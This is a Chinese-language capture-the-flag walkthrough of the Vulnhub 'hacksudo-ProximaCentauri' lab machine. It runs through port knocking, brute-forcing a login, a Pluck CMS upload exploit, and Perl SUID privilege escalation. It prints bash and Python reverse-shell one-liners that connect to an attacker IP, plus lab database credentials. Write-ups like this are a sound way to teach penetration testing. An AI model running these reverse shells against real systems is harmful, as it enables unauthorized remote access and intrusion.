Vulnhub hacksudo-ProximaCentauri walkthrough
前言
这个靶场很有意思,今天就做完这一个吧,该休息一下了,不能老卷,虽然身边大神一堆。以后的保留环节就随缘了,有时候实在是没有什么兴致,越长大就变得越来越沉默寡言了,只能在这谁都不认识我的互联网上随便说点了。
信息收集
之前看见这个 filtered
状态的扫描结果还老傻乎乎的去爆破,自从上次知道了这样是的加了防护的才知道了原来还能这样,这里的结果又是显示被过滤的,所以这里可能还是要对暗号才能使其对我开放。但是现在暗号不知道,但是不妨碍这作为一个已知的信息。而结果又显示 robots.txt
文件有两个敏感目录,等到时候在去访问一下。
HTTP 扫描
至于说什么敏感信息的话到是什么也没发现,但是在页脚那个地方发现了管理员登陆的界面,但是没有什么用处,因为我不知道密码也登陆不上。遇事不决上扫描。
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php -u http://10.0.2.14
为了节省篇幅,我就直接说了,除了画圈的俩之外,其他的界面全是废话,什么用都没有,但是这里最关键的就是 planet
了,那个 flag1
不看也罢。
注释上面写了从这里打开门你可以前往比邻星,这里的比邻星可能暗示的就是目标主机了,总不能真飞到那里,还有就是 RA
代表 open
, Dec
代表 close
,这个东西和上面的扫描结果多么的吻合啊,我坚信这个就是线索。我搜索一下这个玩意儿的地址吧。
经过一点简单的处理之后,这个端口就开了,就对我后门大开(不是)。
寻找密码字典
既然登陆端口已经开了,那么就可以尝试着登陆一下,按照我对于这个作者的了解,这个用户名可能就是 hacksudo
或者是他的前女友 vishal
。
有了一个提示,那就继续往下找。下面这个图可能就是他的密码字典了。但是去哪里爆破呢?没有用户名的字典当然是去网页的登陆界面爆破了。
登陆成功
上传木马
'''
User Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
password = sys.argv[3]
pluckcmspath = sys.argv[4]
按照说明将相关的参数都输入好。
登陆系统
登录上来之后系统上是没有 nc
的,所以只能换种方法反弹 shell
了。bash -c "bash -i >& /dev/tcp/10.0.2.15/1234 0>&1
也不行,只能用
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
mysql.bak
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'proximacentauri' );
/** MySQL database username */
define( 'DB_USER', 'alfauser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'passw0rd' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
在此文件找到以下文件内容,显示了数据库的账号和密码,尝试连接。
MariaDB [(none)]> use proximacentauri;
use proximacentauri;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [proximacentauri]> show tables;
show tables;
+---------------------------+
| Tables_in_proximacentauri |
+---------------------------+
| authors |
+---------------------------+
1 row in set (0.000 sec)
MariaDB [proximacentauri]> select * from authors;
select * from authors;
+------+---------+-----------------+---------------------+
| id | name | password | email |
+------+---------+-----------------+---------------------+
| 1 | proxima | alfacentauri123 | vishal@hacksudo.com |
+------+---------+-----------------+---------------------+
登陆 SSH
在系统的家目录下是发现了数据库中的用户的,这个极有可能是密码。尝试的登陆,由于之前的 knock
已经对暗号了,所以这里不需处理。
提权
从 linpeas.sh
的结果中注意到有这么一个可以设置 suid
的功能。尝试一下。https://gtfobins.github.io/gtfobins/perl/